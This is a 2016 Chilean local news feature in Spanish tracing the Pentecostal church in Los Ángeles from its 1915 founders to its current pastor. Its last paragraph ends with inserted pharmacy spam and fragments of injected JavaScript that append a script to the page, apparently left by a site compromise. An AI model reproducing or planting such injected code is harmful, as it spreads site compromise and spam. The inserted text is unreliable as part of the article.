Reciente

IGLESIA PENTECOSTAL DE CHILE EN LOS ÁNGELES

Reportaje Central / 17/09/2016

La tradición religiosa en Los Ángeles comenzó con el mismo inicio de su proceso fundacional. En efecto, lo primero que se construyó luego de la delineación de lo que sería la plaza de armas, fueron el fuerte militar por el lado sur y la iglesia católica al costado norte. El avance de la misión evangelizadora europea a mediados del siglo XVIII, convertiría al pueblo de Los Ángeles, en el principal enclave militar y religioso de la corona española en la frontera del Imperio. Más tarde, ya en la segunda mitad del siglo XIX, con la llegada de los colonos alemanes, se establece en nuestras tierras el protestantismo, mediante cultos realizados en el recién creado Colegio Alemán (1882), lo que luego se transformaría en 1903, en la Iglesia Luterana.

Sin embargo, lo anterior, conforme se multiplicaba la población del Biobío y se avecinaba el desarrollo social de Los Ángeles, en la segunda década del siglo XX comenzaría su incipiente labor otra importante organización religiosa: La Iglesia Pentecostal. Según lo publicado en la revista Chile Pentecostal de mayo de 1915, se señala a Rosa Escobar de Pino y su hija María Pino, como iniciadoras de la misión en la parte norte de la frontera, a quienes pronto se les incorporaría el pastor Manuel García Caviedes, quien por ese entonces tenía residencia en Mulchén.

Rosa Escobar y María Pino, provenían de Concepción, y lograron establecer una obra en estas tierras, siendo un verdadero desafío, puesto que Los Ángeles y las comunas cercanas, por razones descritas anteriormente, eran muy católicas, sobre todo por los santuarios de Yumbel y San Carlos Purén, que hasta el día de hoy gozan de gran devoción.

Respecto del lugar donde se emplazó inicialmente la iglesia en Los Ángeles, la revista Chile Pentecostal de Julio de 1919, señala que se realizaban reuniones en calle Valdivia esquina Rengo, la que luego se trasladó a San Martín, para luego reubicarse en calle Villagrán esquina Lautaro en “Retén Viejo”, donde estuvieron establecidos por un buen tiempo, y décadas más tarde a calle Lord Cochrane. Durante esos primeros años, siendo su pastor Manuel García Caviedes, se predicó principalmente en la triangulación de las comunas de Mulchén, Angol y Los Ángeles, expandiéndose hacia otros rincones de la Provincia.

Hoy, la Iglesia Metodista Pentecostal de Chile Los Ángeles se prepara para celebrar sus 100 años, con su templo matriz ubicado en Colón N° 781, el más grande de la comuna, y con otros 11 templos anexos. Luego de que falleciera, a los 83 años, el recordado pastor Cristino Rubilar Contreras -quien administró la Iglesia por 44 años- tiene como líder desde el año 2012, a su sobrino el pastor Nelson Rubilar Jorquera, quien con grandes muestras de adhesión y respaldo, destina una nueva etapa en la dirección general de la institución, gestión en obras de infraestructura, modernización de la administración y regente de ceremonias de carácter nacional, han sido su sello, convirtiendo a esta iglesia en una muestra de convivencia religiosa en la sociedad angelina contemporánea. azithromycin canada pharmacy d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);





Artículo Anterior

¿ME DAS UN LIKE?

Artículo Siguiente

ALIANZA CLÍNICA CIMA-CFT SANTO TOMÁS LOS ÁNGELES





0 Comment


Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

9 − cuatro =


More Story

¿ME DAS UN LIKE?

La actual tendencia de sumar adeptos a nuestras publicaciones nos entrega la tarea difícil, pero no imposible, de ejercer...

17/09/2016